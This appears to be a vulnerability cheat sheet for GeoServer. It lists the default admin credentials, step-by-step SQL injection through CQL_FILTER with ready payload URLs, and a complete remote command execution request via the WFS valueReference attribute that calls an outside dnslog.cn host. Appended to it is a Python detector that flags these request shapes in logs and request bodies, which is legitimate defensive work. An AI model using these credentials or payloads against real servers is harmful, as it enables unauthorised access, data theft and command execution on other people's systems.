GeoServer vulnerabilities
1. Weak credentials
user: admin
password: geoserver
2. SQL injection
Affected versions
GeoServer < 2.21.4
GeoServer < 2.22.2
Reproduction
1. Check the GeoServer version
/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage?6&filter=false
2. Get a layer name
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities
Pick the Name value from one of the <FeatureType> tags; it is needed in the next step.
3. Get an attribute name
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=[layer name]&maxFeatures=1&outputFormat=json
Example:
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&maxFeatures=1&outputFormat=json
Pick any field name under "properties" in any returned feature; it is needed in the next step.
4. SQL injection to retrieve the current database version
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=[layer name]&CQL_FILTER=[filter function]([attribute name],%27x%27%27)+%3d+true+and+1%3d(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+%27)+%3d+true
Example:
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&CQL_FILTER=strStartsWith(name,%27x%27%27)+%3d+true+and+1%3d(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+%27)+%3d+true
3. Command execution
Affected versions
GeoServer < 2.23.6
2.24.0 <= GeoServer < 2.24.4
2.25.0 <= GeoServer < 2.25.2
Reproduction
POST /geoserver/wfs HTTP/1.1
Host: xxxx.com
Content-Type: application/xml
Content-Length: 339
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"ping y711vj.dnslog.cn -c 1")'>
<wfs:Query typeNames='top:stop'/>
</wfs:GetPropertyValue>
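As an added defender-side example, not part of the original page, the following Python code flags both request shapes described above: the CQL_FILTER injection from section 2 in access-log lines, and the valueReference expression from section 3 in a WFS 2.0 POST body. The log lines and request bodies are constructed samples, and the regex heuristics are assumptions of this example, not GeoServer's own checks.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&maxFeatures=1&outputFormat=json HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&CQL_FILTER=strStartsWith(name,%27x%27%27)+%3d+true+and+1%3d(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+%27)+%3d+true HTTP/1.1" 500 1024
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:boundary_lines&CQL_FILTER=name%3D%27Canada%27 HTTP/1.1" 200 2048
"""

# Assumed heuristics, not GeoServer's own checks: SQL keywords or comment markers in
# CQL_FILTER, or a doubled quote breaking out of a CQL string literal (the payload above has both).
SQL_MARKERS = re.compile(r"(?i)\b(select|union|cast|sleep|pg_sleep)\b|--|/\*|;")
QUOTE_BREAK = re.compile(r"'[^']*''")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_cql(cql: str) -> bool:
    """True when a decoded CQL_FILTER value looks like SQL injection."""
    return bool(SQL_MARKERS.search(cql) or QUOTE_BREAK.search(cql))

def scan_access_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, decoded CQL_FILTER) for each suspicious GetFeature request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        # parse_qs undoes %xx and '+'; GeoServer reads KVP parameter names case-insensitively
        params = {k.lower(): v for k, v in parse_qs(urlsplit(m.group(1)).query).items()}
        for cql in params.get("cql_filter", []):
            if suspicious_cql(cql):
                hits.append((line.split()[0], cql))
    return hits

def suspicious_value_reference(xml_body: str) -> bool:
    """True when a WFS 2.0 GetPropertyValue body carries a valueReference that is a Java
    call expression instead of a plain property path such as topp:STATE_NAME."""
    ref = ET.fromstring(xml_body).attrib.get("valueReference", "")
    return bool(re.search(r"(?i)\bexec\s*\(|java\.lang\.|getRuntime", ref))

# Constructed request bodies: one benign, one shaped like the command-execution request above.
BENIGN_BODY = ("<wfs:GetPropertyValue service='WFS' version='2.0.0' "
               "xmlns:wfs='http://www.opengis.net/wfs/2.0' valueReference='topp:STATE_NAME'>"
               "<wfs:Query typeNames='topp:states'/></wfs:GetPropertyValue>")
MALICIOUS_BODY = BENIGN_BODY.replace(
    "topp:STATE_NAME", 'exec(java.lang.Runtime.getRuntime(),"PLACEHOLDER_COMMAND")')
```

Run against real logs, expect some false positives from the keyword list and tune it to the layers you actually serve; a 500 response paired with a flagged CQL_FILTER is the strongest signal.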